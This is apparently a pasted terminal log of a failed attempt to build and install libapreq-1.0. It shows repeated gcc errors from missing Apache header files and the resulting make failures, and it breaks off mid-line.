apache_request.h:7:23: http_core.h: No such file or directory apache_request.h:8:22: http_log.h: No such file or directory apache_request.h:9:23: http_main.h: No such file or directory apache_request.h:10:27: http_protocol.h: No such file or directory apache_request.h:11:25: util_script.h: No such file or directory In file included from apache_request.c:59: apache_request.h:38: parse error before "table" apache_request.h:38: warning: no semicolon at end of struct or union apache_request.h:47: parse error before '*' token apache_request.h:47: warning: data definition has no type or storage class apache_request.h:48: parse error before '}' token apache_request.h:48: warning: data definition has no type or storage class apache_request.h:55: parse error before "table" apache_request.h:55: warning: no semicolon at end of struct or union apache_request.h:56: warning: data definition has no type or storage class apache_request.h:58: parse error before '*' token apache_request.h:58: warning: data definition has no type or storage class apache_request.h:59: parse error before '}' token apache_request.h:89: parse error before '*' token apache_request.h:89: parse error before '*' token apache_request.h:89: warning: data definition has no type or storage class apache_request.h:90: parse error before '*' token apache_request.h:91: parse error before '*' token apache_request.h:92: parse error before '*' token apache_request.h:93: parse error before '*' token apache_request.h:94: parse error before '*' token apache_request.h:95: parse error before '*' token apache_request.h:95: parse error before '*' token apache_request.h:95: warning: data definition has no type or storage class apache_request.h:96: parse error before '*' token apache_request.h:97: parse error before '*' token apache_request.h:101: parse error before '*' token apache_request.h:101: parse error before '*' token apache_request.h:101: warning: data definition has no type or storage class apache_request.h:102: parse error before '*' token apache_request.h:120: parse error before '*' token apache_request.h:123: parse error before '*' token In file included from apache_request.c:60: apache_multipart_buffer.h:16: parse error before "request_rec" apache_multipart_buffer.h:16: warning: no semicolon at end of struct or union apache_multipart_buffer.h:29: parse error before '}' token apache_multipart_buffer.h:29: warning: data definition has no type or storage class apache_multipart_buffer.h:31: parse error before '*' token apache_multipart_buffer.h:32: parse error before "request_rec" apache_multipart_buffer.h:32: warning: data definition has no type or storage class apache_multipart_buffer.h:33: parse error before '*' token apache_multipart_buffer.h:33: parse error before '*' token apache_multipart_buffer.h:33: warning: data definition has no type or storage class apache_multipart_buffer.h:34: parse error before '*' token apache_multipart_buffer.h:35: parse error before '*' token apache_multipart_buffer.h:36: parse error before '*' token apache_request.c:61: parse error before '*' token apache_request.c:69: parse error before '*' token apache_request.c: In function `util_read': apache_request.c:71: `request_rec' undeclared (first use in this function) apache_request.c:71: (Each undeclared identifier is reported only once apache_request.c:71: for each function it appears in.) apache_request.c:71: request for member `r' in something not a structure or union apache_request.c:72: `OK' undeclared (first use in this function) apache_request.c:74: `REQUEST_CHUNKED_ERROR' undeclared (first use in this function) apache_request.c:79: `HUGE_STRING_LEN' undeclared (first use in this function) apache_request.c:81: request for member `remaining' in something not a structure or union apache_request.c:83: request for member `post_max' in something not a structure or union apache_request.c:83: request for member `post_max' in something not a structure or union apache_request.c:84: `APLOG_MARK' undeclared (first use in this function) apache_request.c:84: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:84: `APLOG_ERR' undeclared (first use in this function) apache_request.c:84: request for member `r' in something not a structure or union apache_request.c:85: request for member `post_max' in something not a structure or union apache_request.c:86: `HTTP_REQUEST_ENTITY_TOO_LARGE' undeclared (first use in this function) apache_request.c:89: `rbuf' undeclared (first use in this function) apache_request.c:89: request for member `pool' in something not a structure or union apache_request.c: At top level: apache_request.c:111: parse error before '*' token apache_request.c: In function `ApacheRequest_script_name': apache_request.c:113: `request_rec' undeclared (first use in this function) apache_request.c:113: request for member `r' in something not a structure or union apache_request.c:116: request for member `path_info' in something not a structure or union apache_request.c:116: request for member `path_info' in something not a structure or union apache_request.c:117: request for member `uri' in something not a structure or union apache_request.c:117: request for member `path_info' in something not a structure or union apache_request.c:118: request for member `pool' in something not a structure or union apache_request.c:118: request for member `uri' in something not a structure or union apache_request.c:118: warning: assignment makes pointer from integer without a cast apache_request.c:121: request for member `uri' in something not a structure or union apache_request.c: At top level: apache_request.c:127: parse error before '*' token apache_request.c: In function `ApacheRequest_script_path': apache_request.c:129: request for member `r' in something not a structure or union apache_request.c:129: warning: return makes pointer from integer without a cast apache_request.c: At top level: apache_request.c:132: parse error before '*' token apache_request.c: In function `ApacheRequest_param': apache_request.c:134: request for member `status' in something not a structure or union apache_request.c:134: request for member `parsed' in something not a structure or union apache_request.c:134: request for member `status' in something not a structure or union apache_request.c:135: request for member `parms' in something not a structure or union apache_request.c:135: `key' undeclared (first use in this function) apache_request.c:135: warning: return makes pointer from integer without a cast apache_request.c: In function `make_params': apache_request.c:140: `array_header' undeclared (first use in this function) apache_request.c:140: `arr' undeclared (first use in this function) apache_request.c:140: parse error before ')' token apache_request.c: At top level: apache_request.c:145: parse error before '*' token apache_request.c:145: parse error before '*' token apache_request.c: In function `ApacheRequest_params': apache_request.c:147: `array_header' undeclared (first use in this function) apache_request.c:147: `values' undeclared (first use in this function) apache_request.c:147: request for member `r' in something not a structure or union apache_request.c:148: request for member `status' in something not a structure or union apache_request.c:148: request for member `parsed' in something not a structure or union apache_request.c:148: request for member `status' in something not a structure or union apache_request.c:149: request for member `parms' in something not a structure or union apache_request.c:149: `key' undeclared (first use in this function) apache_request.c:149: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:153: parse error before '*' token apache_request.c: In function `ApacheRequest_params_as_string': apache_request.c:155: `NULL' undeclared (first use in this function) apache_request.c:156: `array_header' undeclared (first use in this function) apache_request.c:156: `values' undeclared (first use in this function) apache_request.c:156: `key' undeclared (first use in this function) apache_request.c:160: request for member `r' in something not a structure or union apache_request.c:164: warning: assignment makes pointer from integer without a cast apache_request.c: At top level: apache_request.c:170: parse error before '*' token apache_request.c: In function `ApacheUpload_new': apache_request.c:173: request for member `r' in something not a structure or union apache_request.c:173: sizeof applied to an incomplete type apache_request.c:175: dereferencing pointer to incomplete type apache_request.c:175: `NULL' undeclared (first use in this function) apache_request.c:176: dereferencing pointer to incomplete type apache_request.c:177: dereferencing pointer to incomplete type apache_request.c:178: dereferencing pointer to incomplete type apache_request.c:179: dereferencing pointer to incomplete type apache_request.c:180: dereferencing pointer to incomplete type apache_request.c: In function `ApacheUpload_find': apache_request.c:189: dereferencing pointer to incomplete type apache_request.c:190: dereferencing pointer to incomplete type apache_request.c:195: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:198: parse error before '*' token apache_request.c:198: parse error before '*' token apache_request.c: In function `ApacheRequest_new': apache_request.c:200: invalid operands to binary * apache_request.c:200: parse error before ')' token apache_request.c:203: request for member `status' in something not a structure or union apache_request.c:203: `OK' undeclared (first use in this function) apache_request.c:204: request for member `parms' in something not a structure or union apache_request.c:204: request for member `pool' in something not a structure or union apache_request.c:205: request for member `upload' in something not a structure or union apache_request.c:205: `NULL' undeclared (first use in this function) apache_request.c:206: request for member `post_max' in something not a structure or union apache_request.c:207: request for member `disable_uploads' in something not a structure or union apache_request.c:208: request for member `upload_hook' in something not a structure or union apache_request.c:209: request for member `hook_data' in something not a structure or union apache_request.c:210: request for member `temp_dir' in something not a structure or union apache_request.c:211: request for member `parsed' in something not a structure or union apache_request.c:212: request for member `r' in something not a structure or union apache_request.c: At top level: apache_request.c:219: parse error before '*' token apache_request.c: In function `my_urlword': apache_request.c:225: `line' undeclared (first use in this function) apache_request.c:231: `p' undeclared (first use in this function) apache_request.c:231: warning: assignment makes pointer from integer without a cast apache_request.c:238: warning: assignment makes pointer from integer without a cast apache_request.c:249: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:252: parse error before '*' token apache_request.c: In function `split_to_parms': apache_request.c:254: `request_rec' undeclared (first use in this function) apache_request.c:254: request for member `r' in something not a structure or union apache_request.c:257: `data' undeclared (first use in this function) apache_request.c:257: request for member `pool' in something not a structure or union apache_request.c:258: request for member `pool' in something not a structure or union apache_request.c:258: warning: initialization makes pointer from integer without a cast apache_request.c:265: request for member `parms' in something not a structure or union apache_request.c: At top level: apache_request.c:270: parse error before '*' token apache_request.c: In function `ApacheRequest___parse': apache_request.c:272: `request_rec' undeclared (first use in this function) apache_request.c:272: request for member `r' in something not a structure or union apache_request.c:275: request for member `args' in something not a structure or union apache_request.c:276: request for member `args' in something not a structure or union apache_request.c:279: request for member `method_number' in something not a structure or union apache_request.c:279: `M_POST' undeclared (first use in this function) apache_request.c:280: request for member `headers_in' in something not a structure or union apache_request.c:280: warning: initialization makes pointer from integer without a cast apache_request.c:288: `APLOG_MARK' undeclared (first use in this function) apache_request.c:288: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:288: `APLOG_ERR' undeclared (first use in this function) apache_request.c:288: request for member `r' in something not a structure or union apache_request.c:290: `HTTP_INTERNAL_SERVER_ERROR' undeclared (first use in this function) apache_request.c:297: request for member `parsed' in something not a structure or union apache_request.c: At top level: apache_request.c:302: parse error before '*' token apache_request.c: In function `ApacheRequest_parse_urlencoded': apache_request.c:304: `request_rec' undeclared (first use in this function) apache_request.c:304: request for member `r' in something not a structure or union apache_request.c:305: `OK' undeclared (first use in this function) apache_request.c:307: request for member `method_number' in something not a structure or union apache_request.c:307: `M_POST' undeclared (first use in this function) apache_request.c:308: `NULL' undeclared (first use in this function) apache_request.c:310: request for member `headers_in' in something not a structure or union apache_request.c:310: warning: assignment makes pointer from integer without a cast apache_request.c:313: `DECLINED' undeclared (first use in this function) apache_request.c: In function `remove_tmpfile': apache_request.c:328: invalid operands to binary * apache_request.c:328: dereferencing pointer to incomplete type apache_request.c:330: request for member `r' in something not a structure or union apache_request.c:330: dereferencing pointer to incomplete type apache_request.c:331: `APLOG_MARK' undeclared (first use in this function) apache_request.c:331: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:331: `APLOG_ERR' undeclared (first use in this function) apache_request.c:331: request for member `r' in something not a structure or union apache_request.c:332: dereferencing pointer to incomplete type apache_request.c:334: dereferencing pointer to incomplete type apache_request.c:335: request for member `r' in something not a structure or union apache_request.c:336: dereferencing pointer to incomplete type apache_request.c:339: dereferencing pointer to incomplete type apache_request.c: At top level: apache_request.c:342: parse error before '*' token apache_request.c:342: parse error before '*' token apache_request.c: In function `ApacheRequest_tmpfile': apache_request.c:344: `request_rec' undeclared (first use in this function) apache_request.c:344: request for member `r' in something not a structure or union apache_request.c:345: `FILE' undeclared (first use in this function) apache_request.c:347: `NULL' undeclared (first use in this function) apache_request.c:352: request for member `temp_dir' in something not a structure or union apache_request.c:352: warning: assignment makes pointer from integer without a cast apache_request.c:354: request for member `pool' in something not a structure or union apache_request.c:354: `O_CREAT' undeclared (first use in this function) apache_request.c:354: `O_EXCL' undeclared (first use in this function) apache_request.c:354: `O_RDWR' undeclared (first use in this function) apache_request.c:354: `O_BINARY' undeclared (first use in this function) apache_request.c:361: request for member `pool' in something not a structure or union apache_request.c:361: warning: assignment makes pointer from integer without a cast apache_request.c:362: `APLOG_MARK' undeclared (first use in this function) apache_request.c:362: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:362: `APLOG_ERR' undeclared (first use in this function) apache_request.c:362: request for member `r' in something not a structure or union apache_request.c:367: dereferencing pointer to incomplete type apache_request.c:368: dereferencing pointer to incomplete type apache_request.c:369: request for member `pool' in something not a structure or union apache_request.c:370: `ap_null_cleanup' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:375: parse error before '*' token apache_request.c: In function `ApacheRequest_parse_multipart': apache_request.c:377: `request_rec' undeclared (first use in this function) apache_request.c:377: request for member `r' in something not a structure or union apache_request.c:378: `OK' undeclared (first use in this function) apache_request.c:379: request for member `headers_in' in something not a structure or union apache_request.c:379: warning: initialization makes pointer from integer without a cast apache_request.c:382: `mbuff' undeclared (first use in this function) apache_request.c:383: `NULL' undeclared (first use in this function) apache_request.c:386: `APLOG_MARK' undeclared (first use in this function) apache_request.c:386: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:386: `APLOG_ERR' undeclared (first use in this function) apache_request.c:386: request for member `r' in something not a structure or union apache_request.c:387: `HTTP_INTERNAL_SERVER_ERROR' undeclared (first use in this function) apache_request.c:390: `REQUEST_CHUNKED_ERROR' undeclared (first use in this function) apache_request.c:398: request for member `remaining' in something not a structure or union apache_request.c:398: request for member `post_max' in something not a structure or union apache_request.c:398: request for member `post_max' in something not a structure or union apache_request.c:399: request for member `r' in something not a structure or union apache_request.c:400: request for member `post_max' in something not a structure or union apache_request.c:401: `HTTP_REQUEST_ENTITY_TOO_LARGE' undeclared (first use in this function) apache_request.c:404: request for member `pool' in something not a structure or union apache_request.c:405: request for member `pool' in something not a structure or union apache_request.c:405: warning: assignment makes pointer from integer without a cast apache_request.c:408: `DECLINED' undeclared (first use in this function) apache_request.c:412: `table' undeclared (first use in this function) apache_request.c:412: `header' undeclared (first use in this function) apache_request.c:429: warning: assignment makes pointer from integer without a cast apache_request.c:432: request for member `pool' in something not a structure or union apache_request.c:432: warning: assignment makes pointer from integer without a cast apache_request.c:439: request for member `pool' in something not a structure or union apache_request.c:439: warning: assignment makes pointer from integer without a cast apache_request.c:441: request for member `pool' in something not a structure or union apache_request.c:441: warning: assignment makes pointer from integer without a cast apache_request.c:444: request for member `pool' in something not a structure or union apache_request.c:444: warning: assignment makes pointer from integer without a cast apache_request.c:450: request for member `parms' in something not a structure or union apache_request.c:455: request for member `disable_uploads' in something not a structure or union apache_request.c:456: request for member `r' in something not a structure or union apache_request.c:457: `HTTP_FORBIDDEN' undeclared (first use in this function) apache_request.c:460: request for member `parms' in something not a structure or union apache_request.c:463: dereferencing pointer to incomplete type apache_request.c:464: dereferencing pointer to incomplete type apache_request.c:468: request for member `upload' in something not a structure or union apache_request.c:471: request for member `upload_hook' in something not a structure or union apache_request.c:475: dereferencing pointer to incomplete type apache_request.c:476: dereferencing pointer to incomplete type apache_request.c:476: request for member `r' in something not a structure or union apache_request.c:477: dereferencing pointer to incomplete type apache_request.c:477: request for member `r' in something not a structure or union apache_request.c:483: request for member `remaining' in something not a structure or union apache_request.c:488: request for member `upload_hook' in something not a structure or union apache_request.c:489: request for member `upload_hook' in something not a structure or union apache_request.c:489: request for member `hook_data' in something not a structure or union apache_request.c:491: dereferencing pointer to incomplete type apache_request.c:496: dereferencing pointer to incomplete type apache_request.c:499: dereferencing pointer to incomplete type apache_request.c:499: dereferencing pointer to incomplete type apache_request.c:500: dereferencing pointer to incomplete type apache_request.c: At top level: apache_request.c:535: parse error before "expire_calc" apache_request.c: In function `expire_calc': apache_request.c:562: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:566: parse error before '*' token apache_request.c: In function `ApacheUtil_expires': apache_request.c:568: `time_t' undeclared (first use in this function) apache_request.c:568: parse error before "when" apache_request.c:570: `type' undeclared (first use in this function) apache_request.c:572: `time_str' undeclared (first use in this function) apache_request.c:573: `NULL' undeclared (first use in this function) apache_request.c:576: `when' undeclared (first use in this function) apache_request.c:579: `p' undeclared (first use in this function) apache_request.c:579: warning: return makes pointer from integer without a cast apache_request.c:582: warning: assignment makes pointer from integer without a cast apache_request.c:585: `ap_day_snames' undeclared (first use in this function) apache_request.c:585: dereferencing pointer to incomplete type apache_request.c:586: dereferencing pointer to incomplete type apache_request.c:586: `ap_month_snames' undeclared (first use in this function) apache_request.c:586: dereferencing pointer to incomplete type apache_request.c:587: dereferencing pointer to incomplete type apache_request.c:588: dereferencing pointer to incomplete type apache_request.c:588: dereferencing pointer to incomplete type apache_request.c:588: dereferencing pointer to incomplete type apache_request.c:588: warning: return makes pointer from integer without a cast apache_request.c: At top level: apache_request.c:591: parse error before '*' token apache_request.c: In function `ApacheRequest_expires': apache_request.c:593: request for member `r' in something not a structure or union apache_request.c:593: `time_str' undeclared (first use in this function) make[1]: *** [apache_request.o] Error 1 make[1]: Leaving directory `/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/c' make: *** [subdirs] Error 2 ]0;[email protected]: /backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0 [andrew@localhost libapreq-1.0]$ make install make[1]: Entering directory `/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/c' gcc -c -D_REENTRANT -D_GNU_SOURCE -fno-strict-aliasing -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -O3 -fomit-frame-pointer -pipe -mcpu=pentiumpro -march=i586 -ffast-math -fno-strength-reduce -DVERSION=\"\" -DXS_VERSION=\"\" -fpic "-I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE" apache_request.c In file included from apache_request.c:59: apache_request.h:5:19: httpd.h: No such file or directory apache_request.h:6:25: http_config.h: No such file or directory apache_request.h:7:23: http_core.h: No such file or directory apache_request.h:8:22: http_log.h: No such file or directory apache_request.h:9:23: http_main.h: No such file or directory apache_request.h:10:27: http_protocol.h: No such file or directory apache_request.h:11:25: util_script.h: No such file or directory In file included from apache_request.c:59: apache_request.h:38: parse error before "table" apache_request.h:38: warning: no semicolon at end of struct or union apache_request.h:47: parse error before '*' token apache_request.h:47: warning: data definition has no type or storage class apache_request.h:48: parse error before '}' token apache_request.h:48: warning: data definition has no type or storage class apache_request.h:55: parse error before "table" apache_request.h:55: warning: no semicolon at end of struct or union apache_request.h:56: warning: data definition has no type or storage class apache_request.h:58: parse error before '*' token apache_request.h:58: warning: data definition has no type or storage class apache_request.h:59: parse error before '}' token apache_request.h:89: parse error before '*' token apache_request.h:89: parse error before '*' token apache_request.h:89: warning: data definition has no type or storage class apache_request.h:90: parse error before '*' token apache_request.h:91: parse error before '*' token apache_request.h:92: parse error before '*' token apache_request.h:93: parse error before '*' token apache_request.h:94: parse error before '*' token apache_request.h:95: parse error before '*' token apache_request.h:95: parse error before '*' token apache_request.h:95: warning: data definition has no type or storage class apache_request.h:96: parse error before '*' token apache_request.h:97: parse error before '*' token apache_request.h:101: parse error before '*' token apache_request.h:101: parse error before '*' token apache_request.h:101: warning: data definition has no type or storage class apache_request.h:102: parse error before '*' token apache_request.h:120: parse error before '*' token apache_request.h:123: parse error before '*' token In file included from apache_request.c:60: apache_multipart_buffer.h:16: parse error before "request_rec" apache_multipart_buffer.h:16: warning: no semicolon at end of struct or union apache_multipart_buffer.h:29: parse error before '}' token apache_multipart_buffer.h:29: warning: data definition has no type or storage class apache_multipart_buffer.h:31: parse error before '*' token apache_multipart_buffer.h:32: parse error before "request_rec" apache_multipart_buffer.h:32: warning: data definition has no type or storage class apache_multipart_buffer.h:33: parse error before '*' token apache_multipart_buffer.h:33: parse error before '*' token apache_multipart_buffer.h:33: warning: data definition has no type or storage class apache_multipart_buffer.h:34: parse error before '*' token apache_multipart_buffer.h:35: parse error before '*' token apache_multipart_buffer.h:36: parse error before '*' token apache_request.c:61: parse error before '*' token apache_request.c:69: parse error before '*' token apache_request.c: In function `util_read': apache_request.c:71: `request_rec' undeclared (first use in this function) apache_request.c:71: (Each undeclared identifier is reported only once apache_request.c:71: for each function it appears in.) apache_request.c:71: request for member `r' in something not a structure or union apache_request.c:72: `OK' undeclared (first use in this function) apache_request.c:74: `REQUEST_CHUNKED_ERROR' undeclared (first use in this function) apache_request.c:79: `HUGE_STRING_LEN' undeclared (first use in this function) apache_request.c:81: request for member `remaining' in something not a structure or union apache_request.c:83: request for member `post_max' in something not a structure or union apache_request.c:83: request for member `post_max' in something not a structure or union apache_request.c:84: `APLOG_MARK' undeclared (first use in this function) apache_request.c:84: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:84: `APLOG_ERR' undeclared (first use in this function) apache_request.c:84: request for member `r' in something not a structure or union apache_request.c:85: request for member `post_max' in something not a structure or union apache_request.c:86: `HTTP_REQUEST_ENTITY_TOO_LARGE' undeclared (first use in this function) apache_request.c:89: `rbuf' undeclared (first use in this function) apache_request.c:89: request for member `pool' in something not a structure or union apache_request.c: At top level: apache_request.c:111: parse error before '*' token apache_request.c: In function `ApacheRequest_script_name': apache_request.c:113: `request_rec' undeclared (first use in this function) apache_request.c:113: request for member `r' in something not a structure or union apache_request.c:116: request for member `path_info' in something not a structure or union apache_request.c:116: request for member `path_info' in something not a structure or union apache_request.c:117: request for member `uri' in something not a structure or union apache_request.c:117: request for member `path_info' in something not a structure or union apache_request.c:118: request for member `pool' in something not a structure or union apache_request.c:118: request for member `uri' in something not a structure or union apache_request.c:118: warning: assignment makes pointer from integer without a cast apache_request.c:121: request for member `uri' in something not a structure or union apache_request.c: At top level: apache_request.c:127: parse error before '*' token apache_request.c: In function `ApacheRequest_script_path': apache_request.c:129: request for member `r' in something not a structure or union apache_request.c:129: warning: return makes pointer from integer without a cast apache_request.c: At top level: apache_request.c:132: parse error before '*' token apache_request.c: In function `ApacheRequest_param': apache_request.c:134: request for member `status' in something not a structure or union apache_request.c:134: request for member `parsed' in something not a structure or union apache_request.c:134: request for member `status' in something not a structure or union apache_request.c:135: request for member `parms' in something not a structure or union apache_request.c:135: `key' undeclared (first use in this function) apache_request.c:135: warning: return makes pointer from integer without a cast apache_request.c: In function `make_params': apache_request.c:140: `array_header' undeclared (first use in this function) apache_request.c:140: `arr' undeclared (first use in this function) apache_request.c:140: parse error before ')' token apache_request.c: At top level: apache_request.c:145: parse error before '*' token apache_request.c:145: parse error before '*' token apache_request.c: In function `ApacheRequest_params': apache_request.c:147: `array_header' undeclared (first use in this function) apache_request.c:147: `values' undeclared (first use in this function) apache_request.c:147: request for member `r' in something not a structure or union apache_request.c:148: request for member `status' in something not a structure or union apache_request.c:148: request for member `parsed' in something not a structure or union apache_request.c:148: request for member `status' in something not a structure or union apache_request.c:149: request for member `parms' in something not a structure or union apache_request.c:149: `key' undeclared (first use in this function) apache_request.c:149: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:153: parse error before '*' token apache_request.c: In function `ApacheRequest_params_as_string': apache_request.c:155: `NULL' undeclared (first use in this function) apache_request.c:156: `array_header' undeclared (first use in this function) apache_request.c:156: `values' undeclared (first use in this function) apache_request.c:156: `key' undeclared (first use in this function) apache_request.c:160: request for member `r' in something not a structure or union apache_request.c:164: warning: assignment makes pointer from integer without a cast apache_request.c: At top level: apache_request.c:170: parse error before '*' token apache_request.c: In function `ApacheUpload_new': apache_request.c:173: request for member `r' in something not a structure or union apache_request.c:173: sizeof applied to an incomplete type apache_request.c:175: dereferencing pointer to incomplete type apache_request.c:175: `NULL' undeclared (first use in this function) apache_request.c:176: dereferencing pointer to incomplete type apache_request.c:177: dereferencing pointer to incomplete type apache_request.c:178: dereferencing pointer to incomplete type apache_request.c:179: dereferencing pointer to incomplete type apache_request.c:180: dereferencing pointer to incomplete type apache_request.c: In function `ApacheUpload_find': apache_request.c:189: dereferencing pointer to incomplete type apache_request.c:190: dereferencing pointer to incomplete type apache_request.c:195: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:198: parse error before '*' token apache_request.c:198: parse error before '*' token apache_request.c: In function `ApacheRequest_new': apache_request.c:200: invalid operands to binary * apache_request.c:200: parse error before ')' token apache_request.c:203: request for member `status' in something not a structure or union apache_request.c:203: `OK' undeclared (first use in this function) apache_request.c:204: request for member `parms' in something not a structure or union apache_request.c:204: request for member `pool' in something not a structure or union apache_request.c:205: request for member `upload' in something not a structure or union apache_request.c:205: `NULL' undeclared (first use in this function) apache_request.c:206: request for member `post_max' in something not a structure or union apache_request.c:207: request for member `disable_uploads' in something not a structure or union apache_request.c:208: request for member `upload_hook' in something not a structure or union apache_request.c:209: request for member `hook_data' in something not a structure or union apache_request.c:210: request for member `temp_dir' in something not a structure or union apache_request.c:211: request for member `parsed' in something not a structure or union apache_request.c:212: request for member `r' in something not a structure or union apache_request.c: At top level: apache_request.c:219: parse error before '*' token apache_request.c: In function `my_urlword': apache_request.c:225: `line' undeclared (first use in this function) apache_request.c:231: `p' undeclared (first use in this function) apache_request.c:231: warning: assignment makes pointer from integer without a cast apache_request.c:238: warning: assignment makes pointer from integer without a cast apache_request.c:249: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:252: parse error before '*' token apache_request.c: In function `split_to_parms': apache_request.c:254: `request_rec' undeclared (first use in this function) apache_request.c:254: request for member `r' in something not a structure or union apache_request.c:257: `data' undeclared (first use in this function) apache_request.c:257: request for member `pool' in something not a structure or union apache_request.c:258: request for member `pool' in something not a structure or union apache_request.c:258: warning: initialization makes pointer from integer without a cast apache_request.c:265: request for member `parms' in something not a structure or union apache_request.c: At top level: apache_request.c:270: parse error before '*' token apache_request.c: In function `ApacheRequest___parse': apache_request.c:272: `request_rec' undeclared (first use in this function) apache_request.c:272: request for member `r' in something not a structure or union apache_request.c:275: request for member `args' in something not a structure or union apache_request.c:276: request for member `args' in something not a structure or union apache_request.c:279: request for member `method_number' in something not a structure or union apache_request.c:279: `M_POST' undeclared (first use in this function) apache_request.c:280: request for member `headers_in' in something not a structure or union apache_request.c:280: warning: initialization makes pointer from integer without a cast apache_request.c:288: `APLOG_MARK' undeclared (first use in this function) apache_request.c:288: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:288: `APLOG_ERR' undeclared (first use in this function) apache_request.c:288: request for member `r' in something not a structure or union apache_request.c:290: `HTTP_INTERNAL_SERVER_ERROR' undeclared (first use in this function) apache_request.c:297: request for member `parsed' in something not a structure or union apache_request.c: At top level: apache_request.c:302: parse error before '*' token apache_request.c: In function `ApacheRequest_parse_urlencoded': apache_request.c:304: `request_rec' undeclared (first use in this function) apache_request.c:304: request for member `r' in something not a structure or union apache_request.c:305: `OK' undeclared (first use in this function) apache_request.c:307: request for member `method_number' in something not a structure or union apache_request.c:307: `M_POST' undeclared (first use in this function) apache_request.c:308: `NULL' undeclared (first use in this function) apache_request.c:310: request for member `headers_in' in something not a structure or union apache_request.c:310: warning: assignment makes pointer from integer without a cast apache_request.c:313: `DECLINED' undeclared (first use in this function) apache_request.c: In function `remove_tmpfile': apache_request.c:328: invalid operands to binary * apache_request.c:328: dereferencing pointer to incomplete type apache_request.c:330: request for member `r' in something not a structure or union apache_request.c:330: dereferencing pointer to incomplete type apache_request.c:331: `APLOG_MARK' undeclared (first use in this function) apache_request.c:331: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:331: `APLOG_ERR' undeclared (first use in this function) apache_request.c:331: request for member `r' in something not a structure or union apache_request.c:332: dereferencing pointer to incomplete type apache_request.c:334: dereferencing pointer to incomplete type apache_request.c:335: request for member `r' in something not a structure or union apache_request.c:336: dereferencing pointer to incomplete type apache_request.c:339: dereferencing pointer to incomplete type apache_request.c: At top level: apache_request.c:342: parse error before '*' token apache_request.c:342: parse error before '*' token apache_request.c: In function `ApacheRequest_tmpfile': apache_request.c:344: `request_rec' undeclared (first use in this function) apache_request.c:344: request for member `r' in something not a structure or union apache_request.c:345: `FILE' undeclared (first use in this function) apache_request.c:347: `NULL' undeclared (first use in this function) apache_request.c:352: request for member `temp_dir' in something not a structure or union apache_request.c:352: warning: assignment makes pointer from integer without a cast apache_request.c:354: request for member `pool' in something not a structure or union apache_request.c:354: `O_CREAT' undeclared (first use in this function) apache_request.c:354: `O_EXCL' undeclared (first use in this function) apache_request.c:354: `O_RDWR' undeclared (first use in this function) apache_request.c:354: `O_BINARY' undeclared (first use in this function) apache_request.c:361: request for member `pool' in something not a structure or union apache_request.c:361: warning: assignment makes pointer from integer without a cast apache_request.c:362: `APLOG_MARK' undeclared (first use in this function) apache_request.c:362: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:362: `APLOG_ERR' undeclared (first use in this function) apache_request.c:362: request for member `r' in something not a structure or union apache_request.c:367: dereferencing pointer to incomplete type apache_request.c:368: dereferencing pointer to incomplete type apache_request.c:369: request for member `pool' in something not a structure or union apache_request.c:370: `ap_null_cleanup' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:375: parse error before '*' token apache_request.c: In function `ApacheRequest_parse_multipart': apache_request.c:377: `request_rec' undeclared (first use in this function) apache_request.c:377: request for member `r' in something not a structure or union apache_request.c:378: `OK' undeclared (first use in this function) apache_request.c:379: request for member `headers_in' in something not a structure or union apache_request.c:379: warning: initialization makes pointer from integer without a cast apache_request.c:382: `mbuff' undeclared (first use in this function) apache_request.c:383: `NULL' undeclared (first use in this function) apache_request.c:386: `APLOG_MARK' undeclared (first use in this function) apache_request.c:386: `APLOG_NOERRNO' undeclared (first use in this function) apache_request.c:386: `APLOG_ERR' undeclared (first use in this function) apache_request.c:386: request for member `r' in something not a structure or union apache_request.c:387: `HTTP_INTERNAL_SERVER_ERROR' undeclared (first use in this function) apache_request.c:390: `REQUEST_CHUNKED_ERROR' undeclared (first use in this function) apache_request.c:398: request for member `remaining' in something not a structure or union apache_request.c:398: request for member `post_max' in something not a structure or union apache_request.c:398: request for member `post_max' in something not a structure or union apache_request.c:399: request for member `r' in something not a structure or union apache_request.c:400: request for member `post_max' in something not a structure or union apache_request.c:401: `HTTP_REQUEST_ENTITY_TOO_LARGE' undeclared (first use in this function) apache_request.c:404: request for member `pool' in something not a structure or union apache_request.c:405: request for member `pool' in something not a structure or union apache_request.c:405: warning: assignment makes pointer from integer without a cast apache_request.c:408: `DECLINED' undeclared (first use in this function) apache_request.c:412: `table' undeclared (first use in this function) apache_request.c:412: `header' undeclared (first use in this function) apache_request.c:429: warning: assignment makes pointer from integer without a cast apache_request.c:432: request for member `pool' in something not a structure or union apache_request.c:432: warning: assignment makes pointer from integer without a cast apache_request.c:439: request for member `pool' in something not a structure or union apache_request.c:439: warning: assignment makes pointer from integer without a cast apache_request.c:441: request for member `pool' in something not a structure or union apache_request.c:441: warning: assignment makes pointer from integer without a cast apache_request.c:444: request for member `pool' in something not a structure or union apache_request.c:444: warning: assignment makes pointer from integer without a cast apache_request.c:450: request for member `parms' in something not a structure or union apache_request.c:455: request for member `disable_uploads' in something not a structure or union apache_request.c:456: request for member `r' in something not a structure or union apache_request.c:457: `HTTP_FORBIDDEN' undeclared (first use in this function) apache_request.c:460: request for member `parms' in something not a structure or union apache_request.c:463: dereferencing pointer to incomplete type apache_request.c:464: dereferencing pointer to incomplete type apache_request.c:468: request for 